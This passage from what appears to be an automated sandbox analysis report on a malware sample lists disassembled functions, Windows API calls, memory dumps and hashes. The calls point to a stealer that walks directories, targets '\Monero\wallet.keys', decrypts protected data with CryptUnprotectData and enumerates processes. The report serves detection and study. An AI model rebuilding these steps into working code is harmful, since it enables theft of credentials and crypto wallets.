                              • StrCmpCA.SHLWAPI(?,008C14C8), ref: 008ADEAE
                              • StrCmpCA.SHLWAPI(?,008C14CC), ref: 008ADEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AE3E0
                              • FindClose.KERNEL32(000000FF), ref: 008AE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 6e18b096f6a1d246760e2a5cd6affde6549abbb30db2f511b1cff009303d5c14
                              • Instruction ID: f1ccb4e7fe07b3e30e433931335f25d1e3f7ef307b6edcb8040b58080be41e2c
                              • Opcode Fuzzy Hash: 6e18b096f6a1d246760e2a5cd6affde6549abbb30db2f511b1cff009303d5c14
                              • Instruction Fuzzy Hash: 08F18271814118AADB2DEB64CCA5EEE7338FF54300F8041E9A41AE6591EF346B4ACF57
                              Function 00C6D61F Relevance: 14.1, Strings: 10, Instructions: 1624COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +_{$0_{$F/\|$P^O$T6_k$_~wX$bfO$fP=|$txw\$z\_
                              • API String ID: 0-1473951366
                              • Opcode ID: 6cee983ba22f08d9b03edef08684f358df010db00b49d8305a8dd4d71e30bf4c
                              • Instruction ID: 861e00509151ff1e5c368b98d3a93d5b5bcf091119c501335d1a781a508d47c3
                              • Opcode Fuzzy Hash: 6cee983ba22f08d9b03edef08684f358df010db00b49d8305a8dd4d71e30bf4c
                              • Instruction Fuzzy Hash: 3EB228F3A082009FE7046E2DEC8577ABBE5EF94720F1A4A3DE6C4C7744E63598058697
                              Function 008ADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C14B0,008C0C2A), ref: 008ADAEB
                              • StrCmpCA.SHLWAPI(?,008C14B4), ref: 008ADB33
                              • StrCmpCA.SHLWAPI(?,008C14B8), ref: 008ADB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008ADDCC
                              • FindClose.KERNEL32(000000FF), ref: 008ADDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: e48c82648ff689ccdbe4780ccf2776081145bb044af7a31c291983a4134d7e86
                              • Instruction ID: 8d6eff6e51c37adffeb19dcc7dbb5d37f2ac23a5a66fcd8d7fea39ae6c02e282
                              • Opcode Fuzzy Hash: e48c82648ff689ccdbe4780ccf2776081145bb044af7a31c291983a4134d7e86
                              • Instruction Fuzzy Hash: 22917572900204A7DB18FBB4DC969ED737CFB95300F408568F85AD6691EE34AB09CB93
                              Function 008B7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,008C05AF), ref: 008B7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 008B7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 008B7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008B7C62
                              • LocalFree.KERNEL32(00000000), ref: 008B7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 749c614033a6f344b56b130fb8afce16a266aff56d98285bc59d8efe97cb6fe9
                              • Instruction ID: b2311b63783bc23a937f81d644470bf60702589d28d34d1e30fb24a18ba39ef7
                              • Opcode Fuzzy Hash: 749c614033a6f344b56b130fb8afce16a266aff56d98285bc59d8efe97cb6fe9
                              • Instruction Fuzzy Hash: A5414E7194021CABDB24DB94DC99BEEB778FF54700F2041D9E409A6291DB346F85CFA2
                              Function 008AE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,008C0D73), ref: 008AE4A2
                              • StrCmpCA.SHLWAPI(?,008C14F8), ref: 008AE4F2
                              • StrCmpCA.SHLWAPI(?,008C14FC), ref: 008AE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 7b22b97d45977188af33762a2545097c71554ecda3ed9cfec9aa957e4099688d
                              • Instruction ID: 70707323791ac5ded2e45e8df2eb39c34d7d395bc17b36e0ce67a96d0d613904
                              • Opcode Fuzzy Hash: 7b22b97d45977188af33762a2545097c71554ecda3ed9cfec9aa957e4099688d
                              • Instruction Fuzzy Hash: EA121071910118AADB28FB68DCE6EED7338FF54300F4045A8B51AD6691EE346F49CB93
                              Function 00C6346D Relevance: 9.2, Strings: 6, Instructions: 1657COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "!}$3/0A$MB;}$Me_?$NWk[$uxm]
                              • API String ID: 0-3943570821
                              • Opcode ID: bb2066af79a552ad28d813f5092bd43a38ef5f0e3288ea9a8f1e0efeae66723f
                              • Instruction ID: 7c00c3d70585145be11d50c9ad21e83f3316795bab5d957ca68b84c93174c0cb
                              • Opcode Fuzzy Hash: bb2066af79a552ad28d813f5092bd43a38ef5f0e3288ea9a8f1e0efeae66723f
                              • Instruction Fuzzy Hash: CEB22CF3A0C2049FE304AE2DEC8567AB7EAEFD4720F1A853DE6C5C7344E93558058696
                              Function 00C741DF Relevance: 7.9, Strings: 5, Instructions: 1649COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 61o\$Fe~$a<og$a=N$d9n
                              • API String ID: 0-3653806338
                              • Opcode ID: bd5629f88c17e44d3abc138be80829260473365be2d04c9ddc181f82f3e5fcab
                              • Instruction ID: 363f5d448ccad53d01c83171e09e4f7c00e4a15157cec6fa46eaf18f309ddf1b
                              • Opcode Fuzzy Hash: bd5629f88c17e44d3abc138be80829260473365be2d04c9ddc181f82f3e5fcab
                              • Instruction Fuzzy Hash: 3CB247F3A0C2149FE3046E2DEC8567AFBE9EFD4320F1A493DE6C487744EA3558058696
                              Function 008AC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008AC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008AC87C
                              • lstrcat.KERNEL32(?,008C0B46), ref: 008AC943
                              • lstrcat.KERNEL32(?,008C0B47), ref: 008AC957
                              • lstrcat.KERNEL32(?,008C0B4E), ref: 008AC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 9d6f305b95d997d4d29e654c08b0874caa12c6ceab9d2448123fbd8103019746
                              • Instruction ID: a19f3087fa4b5824659c2221461fa4ce9fe672438a73d5adf320201b62f33105
                              • Opcode Fuzzy Hash: 9d6f305b95d997d4d29e654c08b0874caa12c6ceab9d2448123fbd8103019746
                              • Instruction Fuzzy Hash: 3541517590421ADBDB10DFE4CD89BEEBBB8FB48304F1445A8F509AA280D7746A85CF91
                              Function 008A7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008A724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008A7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008A72A4
                              • LocalFree.KERNEL32(?), ref: 008A72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 56c5b61f26b4ecbb7862893ef03563e18852dd578fd3fde3313e355c0ded3cd7
                              • Instruction ID: 8abec4025488858da9e0aeeda7ee5b955966cbe84070793ea19ec97fe0c92a5c
                              • Opcode Fuzzy Hash: 56c5b61f26b4ecbb7862893ef03563e18852dd578fd3fde3313e355c0ded3cd7
                              • Instruction Fuzzy Hash: D701ED75A40208BBEB10DBD4CD85F9D7778EB44704F104154FB05EA2C0D670BA018B65
                              Function 008B9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008B961E
                              • Process32First.KERNEL32(008C0ACA,00000128), ref: 008B9632
                              • Process32Next.KERNEL32(008C0ACA,00000128), ref: 008B9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 008B965C
                              • CloseHandle.KERNEL32(008C0ACA), ref: 008B967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: ec3d7068c67755e2b1bfa2b23248cb5d7b9689a62c6e776467fc98112b9e30a9
                              • Instruction ID: eb36af371deb95ff30ce8d68b3bcc4036dda87670f57dfdd20b3ab6c314aaaf5
                              • Opcode Fuzzy Hash: ec3d7068c67755e2b1bfa2b23248cb5d7b9689a62c6e776467fc98112b9e30a9
                              • Instruction Fuzzy Hash: EA010CB5A00208ABDB14DFA5CD98BEDBBF8FB68300F104188E94AD6240E734AB41CF51
                              Function 00C726CC Relevance: 6.7, Strings: 4, Instructions: 1669COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
